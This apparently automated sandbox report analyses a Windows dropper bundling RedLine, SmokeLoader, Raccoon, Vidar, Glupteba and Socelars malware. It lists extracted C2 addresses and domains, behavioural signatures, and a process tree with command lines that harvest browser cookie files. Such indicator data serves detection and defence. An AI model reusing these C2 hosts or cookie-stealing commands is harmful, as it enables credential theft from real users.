Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
167s -
max time network
1807s -
platform
windows11_x64 -
resource
win11 -
submitted
18-08-2021 20:25
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Score
10/10
Malware Config
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
FIRST_7.5k
C2
45.14.49.200:27625
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Raccoon Stealer Payload 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 25 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
evasion 7 IoCs
evasion.
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 1 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 18 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 6 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
-
Suspicious use of SetThreadContext 16 IoCs
-
Drops file in Program Files directory 28 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 35 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 37 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 4 IoCs
-
Modifies system certificate store 2 TTPs 10 IoCs
-
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a647183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2592 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2072 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1892 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:13⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\lisoce45yJdfxtoDinkLPBB0.exe"C:\Users\Admin\Documents\lisoce45yJdfxtoDinkLPBB0.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 2924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"4⤵
-
-
-
C:\Users\Admin\Documents\4L2GsvQzMO7vo0QaK9U3olVx.exe"C:\Users\Admin\Documents\4L2GsvQzMO7vo0QaK9U3olVx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"4⤵
-
-
-
C:\Users\Admin\Documents\fyeOs5QJVz_AdrttNf_bhMfo.exe"C:\Users\Admin\Documents\fyeOs5QJVz_AdrttNf_bhMfo.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
C:\Users\Admin\Documents\IvikQulGbRWAwMsnu_ycAl0V.exe"C:\Users\Admin\Documents\IvikQulGbRWAwMsnu_ycAl0V.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 3004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\zzx.exe"C:\Users\Admin\AppData\Local\Temp\zzx.exe"5⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\zzx.exeC:\Users\Admin\AppData\Local\Temp\zzx.exe6⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\zzx.exeC:\Users\Admin\AppData\Local\Temp\zzx.exe6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 367⤵
- Program crash
-
-
-
-
-
-
C:\Users\Admin\Documents\4VN6wp3p249Peftj5bgWx74K.exe"C:\Users\Admin\Documents\4VN6wp3p249Peftj5bgWx74K.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 3124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\Sxg9ZZxbMH8kA5rom8mY1FbX.exe"C:\Users\Admin\Documents\Sxg9ZZxbMH8kA5rom8mY1FbX.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\oZ7g_D9oITjP6QBP7YE7EdXv.exe"C:\Users\Admin\Documents\oZ7g_D9oITjP6QBP7YE7EdXv.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\build.exeC:\Users\Admin\AppData\Local\Temp\build.exe5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 286⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"5⤵
-
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"6⤵
-
-
-
-
-
C:\Users\Admin\Documents\wuxK2JwKEIjFJEie_od4yOxD.exe"C:\Users\Admin\Documents\wuxK2JwKEIjFJEie_od4yOxD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\1nrJiz9SHjwr79c1yUpRUJCm.exe"C:\Users\Admin\Documents\1nrJiz9SHjwr79c1yUpRUJCm.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
